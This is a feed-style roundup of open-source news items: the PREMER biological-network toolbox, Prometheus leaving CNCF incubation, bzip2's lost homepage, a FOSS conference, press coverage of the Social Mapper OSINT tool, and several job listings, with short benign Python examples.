          PREMER: A Tool to Infer Biological Networks
Inferring the structure of unknown cellular networks is a main challenge in computational biology. Data-driven approaches based on information theory can determine the existence of interactions among network nodes automatically. However, the elucidation of certain features—such as distinguishing between direct and indirect interactions or determining the direction of a causal link—requires estimating information-theoretic quantities in a multidimensional space. This can be a computationally demanding task, which acts as a bottleneck for the application of elaborate algorithms to large-scale network inference problems. The computational cost of such calculations can be alleviated by the use of compiled programs and parallelization. To this end, we have developed PREMER (Parallel Reverse Engineering with Mutual information & Entropy Reduction), a software toolbox that can run in parallel and sequential environments. It uses information theoretic criteria to recover network topology and determine the strength and causality of interactions, and allows incorporating prior knowledge, imputing missing data, and correcting outliers. PREMER is a free, open source software tool that does not require any commercial software. Its core algorithms are programmed in FORTRAN 90 and implement OpenMP directives. It has user interfaces in Python and MATLAB/Octave, and runs on Windows, Linux, and OSX (https://sites.google.com/site/premertoolbox/).
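
PREMER itself ships compiled FORTRAN 90 cores behind Python and MATLAB/Octave front ends, so the sketch below is not PREMER's interface. It is only a hedged Python illustration of the kind of pairwise information-theoretic criterion such tools start from, scoring candidate links by a histogram estimate of mutual information (the bin count, threshold, and data layout are assumptions for the example):

    import numpy as np

    def mutual_information(x, y, bins=8):
        """Histogram estimate of I(X;Y) in nats."""
        joint, _, _ = np.histogram2d(x, y, bins=bins)
        pxy = joint / joint.sum()
        px = pxy.sum(axis=1, keepdims=True)
        py = pxy.sum(axis=0, keepdims=True)
        nz = pxy > 0  # avoid log(0) on empty cells
        return float((pxy[nz] * np.log(pxy[nz] / (px @ py)[nz])).sum())

    def infer_edges(data, threshold=0.1):
        """Return (i, j, mi) for variable pairs whose MI exceeds the threshold.

        data: array of shape (n_samples, n_variables)."""
        n = data.shape[1]
        edges = []
        for i in range(n):
            for j in range(i + 1, n):
                mi = mutual_information(data[:, i], data[:, j])
                if mi > threshold:
                    edges.append((i, j, mi))
        return edges

    # Toy usage: two coupled variables and one independent one.
    rng = np.random.default_rng(0)
    x = rng.normal(size=500)
    data = np.column_stack([x, x + 0.1 * rng.normal(size=500), rng.normal(size=500)])
    print(infer_edges(data))

Distinguishing direct from indirect interactions then requires conditional, higher-dimensional estimates over many variable subsets, which is exactly the cost PREMER attacks with compiled code and OpenMP parallelism.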
          Particle CEO Zach Supalla Talks the Reality of IoT

The Internet of Things is slowly working its way into our lives, to the point where we’ll just call them Things. With so many software projects, open source tools, and hardware devices out there, it can be tough to even make the distinction between a modern sprinkler system and one that is internet-enabled: non-internet-enabled devices […]

The post Particle CEO Zach Supalla Talks the Reality of IoT appeared first on The New Stack.


          Microservices Monitor Prometheus Emerges from CNCF Incubation

Software originally created by SoundCloud to monitor a complex set of dynamically-provisioned software services has graduated from an incubation program sponsored by the Cloud Native Computing Foundation (CNCF). Prometheus is the second open source software program to graduate from the CNCF, following the Kubernetes open source container orchestration engine, originally developed by Google. The CNCF announced the graduation at the annual […]
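
For a sense of what instrumenting a service for Prometheus looks like, here is a minimal sketch using the official prometheus_client Python library (the metric name, label, and port are made up for the example); Prometheus then scrapes the exposed /metrics endpoint on its own schedule:

    import random
    import time

    from prometheus_client import Counter, start_http_server

    # A counter with one label; Prometheus aggregates it across scrapes.
    REQUESTS = Counter("demo_requests_total", "Requests handled, by outcome", ["outcome"])

    if __name__ == "__main__":
        start_http_server(8000)  # serves metrics at http://localhost:8000/metrics
        while True:
            REQUESTS.labels(outcome=random.choice(["ok", "error"])).inc()
            time.sleep(1)

This pull-based scrape model is part of what makes Prometheus a fit for dynamically provisioned services: targets only need to expose an HTTP endpoint.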

The post Microservices Monitor Prometheus Emerges from CNCF Incubation appeared first on The New Stack.


          (USA-OR-Beaverton) Senior Software Engineer
Become a Part of the NIKE, Inc. Team

NIKE, Inc. does more than outfit the world's best athletes. It is a place to explore potential, obliterate boundaries and push out the edges of what can be. The company looks for people who can grow, think, dream and create. Its culture thrives by embracing diversity and rewarding imagination. The brand seeks achievers, leaders and visionaries. At Nike, it’s about each person bringing skills and passion to a challenging and constantly evolving game.

Nike Technology designs, creates and implements the methods and tools needed to make the world’s largest sports brand run faster, smarter and more securely. Global Technology teams aggressively innovate the solutions needed to help employees navigate Nike's rapidly evolving landscape. From infrastructure to security and supply chain operations, Technology specialists drive growth through top-flight hardware, software and enterprise applications. Simply put, without Nike Technology, there are no Nike products.

**Description**

We are looking for software development engineers who excel in team environments and are excited about building cloud native platforms that can scale with the demand of our business.

SCOPE & RESPONSIBILITIES

+ Evangelize and cultivate adoption of Enterprise Platforms, open source software and agile principles within the organization
+ Ensure solutions are designed and developed using a scalable, highly resilient cloud native architecture
+ Deliver well-documented and well-tested code, and participate in peer code reviews
+ Design and develop tools and frameworks to improve security, reliability, maintainability, availability and performance for the technology foundation of our platform
+ Ensure product and technical features are delivered to spec and on-time
+ Collaborate with and consult other Nike development teams
+ Explain designs and constraints to stakeholders and technical teams
+ Assist in the support and operation of the platforms you help build
+ Work with product management to support product / service scoping activities
+ Work with leadership to define delivery schedules of key features through an agile framework
+ Be a key contributor to overall architecture, framework and design of enterprise platforms

**Qualifications**

+ Masters’ or Bachelors' degree in Computer Science or a related field
+ 5+ years of experience in large-scale software development
+ 5+ years of experience architecting and building scalable data architecture
+ Prefer 5 or more years of hands-on experience with AWS, Azure, GCP or similar cloud platform
+ 5+ years of development experience in languages like Golang, Python, Ruby, Java, Scala or Node.js
+ Expertise with front-end development using JavaScript frameworks (React, Angular, etc), HTML and CSS a plus
+ Experience with securing RESTful APIs and Apps using OAuth, OpenID Connect, and JWT a plus
+ Experience with both relational and No-SQL databases
+ Exposure to Docker, Kubernetes or other container technologies
+ Experience with participating in projects in a highly collaborative, multi-discipline development team environment
+ Exposure to Agile and test-driven development
+ Exposure to hierarchical and distributed code repository management tools like GIT
+ Great communications skills

NIKE, Inc. is a growth company that looks for team members to grow with it. Nike offers a generous total rewards package, casual work environment, a diverse and inclusive culture, and an electric atmosphere for professional development. No matter the location, or the role, every Nike employee shares one galvanizing mission: To bring inspiration and innovation to every athlete* in the world. NIKE, Inc. is committed to employing a diverse workforce. Qualified applicants will receive consideration without regard to race, color, religion, sex, national origin, age, sexual orientation, gender identity, gender expression, veteran status, or disability.

**Job ID:** 00401843
**Location:** United States-Oregon-Beaverton
**Job Category:** Technology
          Integrated Reporting, Open Source Security, Washington State Parks, More: Thursday Afternoon Buzz, August 9, 2018
NEW RESOURCES Business Green: New database to highlight benefits of integrated reporting. “The free database includes a wide range of studies and papers exploring how integrated reporting that brings together financial and […]
          OSS Leftovers
  • Open source Kaa IoT middleware to take on enterprise IoT

    To benefit from IoT, businesses need a way to network, manage and secure all of their connected devices. While there are proprietary IoT middleware platforms available to do this for the home and heavy industries like manufacturing, the Kaa IoT platform is one of the few open source options on the market today that is business-ready.

  • bzip.org changes hands

    The bzip2 compression algorithm has been slowly falling out of favor, but is still used heavily across the net. A search for "bzip2 source" returns bzip.org as the first three results. But it would seem that the owner of this domain has let it go, and it is now parked and running ads. So we no longer have an official home for bzip2. (A short usage sketch of the format follows this list.)

  • Three Capabilities Banks Need to Work On While Adopting Open Source

    As banks are now willing to experiment and adopt new age technologies such as artificial intelligence and blockchain, the next big step of its digital disruption has to do with open source banking.

    With the adoption of open source, banks are likely to open their APIs and share customer data with third-party players to develop innovative products and offer customized real-time bespoke services to customers.

    Industry experts consider it to be the best time to embrace open banking as customer buying patterns are changing.

    In a previous interaction with Entrepreneur India, Rajeev Ahuja, Executive Director, RBL Bank attributed this change to “the emergence of nontraditional competition such as fintech startups, growing domination of technologies like blockchain, artificial intelligences, machine learning, etc and lastly, the initiatives taken by the Reserve Bank Of India to regulated the payments banks, peer to peer lending platforms, linking of Aadhar, and e-kyc.”

  • Free and open-source software con returns to International House

    FOSSCon, a free and open-source software conference, will be held Aug. 25 at the International House Philadelphia. Lectures and workshops will teach participants about free software and new ways to use it.

    Unlike most software, which is only available under restrictive licensing, free and open-source software is available under licenses that let people distribute, run and modify the software for their own purposes. It includes well-known projects like the Firefox browser or the Linux kernel. Those who talk about “free software” emphasize the way copyright law restricts users’ freedom, while those who talk about “open source” emphasize the economic and technical benefits of shared development.

    However, most of the scheduled events are far from philosophical, focusing on technical subjects like the use of domain name systems or the filesystem ZFS. The speakers range from professional programmers to enthusiasts. Most famous on the list is Eric S. Raymond, one of the thinkers behind “open source,” who will speak about the history of the C programming language and what might replace it. Of particular local interest is a talk by Eric O’Callaghan, a systems administrator at Thomas Jefferson University, on how to use public data from Indego Bike Share.
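
Following up the bzip2 item above: whatever becomes of the project's homepage, the format itself stays easy to reach from most languages. A minimal sketch using Python's standard-library bz2 module (the payload is made up):

    import bz2

    data = b"an example payload, repeated so the compressor has patterns to find " * 200
    compressed = bz2.compress(data, compresslevel=9)
    print(f"{len(data)} bytes -> {len(compressed)} bytes")
    assert bz2.decompress(compressed) == data  # round-trip check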


          Social Mapper Debut
  • Social Mapper: A free tool for automated discovery of targets’ social media accounts

    The tool takes advantage of facial recognition technology and searches for targets’ accounts on LinkedIn, Facebook, Twitter, Google+, Instagram, VKontakte, Weibo and Douban.

  • Social Mapper uses facial recognition to track 'targets' on social media

    RESEARCHERS at US security company Trustwave have released a rather scary new open source tool called 'Social Mapper' that can be used to track "targets" across social media networks using facial recognition.

    The potentially-devious tool works by taking an "automated approach" to searching popular social media sites for names and pictures of people you're looking to track. It can accurately detect and group a person's presence, outputting the results into a report that a human operator can quickly review.

    "Performing intelligence gathering is a time-consuming process, it typically starts by attempting to find a person's online presence on a variety of social media sites," the company asked itself in a news release announcing the software.

  • Social Mapper: This Open Source Tool Lets “Good” Hackers Track People On Social Media

    There are tons of automated tools and services that any shady hacker can employ to grab the public data on Facebook, Twitter, Google, or Instagram, and use it for notorious purposes. But what about the ethical hackers and security researchers who are looking for a means to achieve the same?

    To tackle this issue, security firm Trustwave has released an open source tool that cuts down the time consumed by such large-scale intelligence gathering. Called Social Mapper, the tool uses facial recognition to connect the dots across different social media sites and collect data.

  • Need a facial recognition auto-doxxx tool? Social Mapper has you covered

    Finding people's social media profiles can be a slow and manual business – so why not get facial recognition to help?

    That's the pitch coming from Trustwave's SpiderLabs, which wants to make life easier for penetration testers trying to infiltrate clients' networks and facilities using social engineering and targeted hackery.

    SpiderLabs' Jacob Wilkin explained that new tool Social Mapper can start with the name of an organisation on LinkedIn, a folder full of named images, or a CSV listing of names with URLs to images. With those inputs, he explained this week, the software's facial recognition capabilities can “correlate social media profiles across a number of different sites on a large scale.”


          UX Developer Lead, Themes - Shopify - Montréal, QC
We champion Slate, an open source development tool, and work with our colleagues across the Online store channel to shape the development of new platform...
From Shopify - Tue, 10 Jul 2018 20:00:27 GMT - View all Montréal, QC jobs
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          calibre Portable 3.29 (ebook manager, viewer, converter)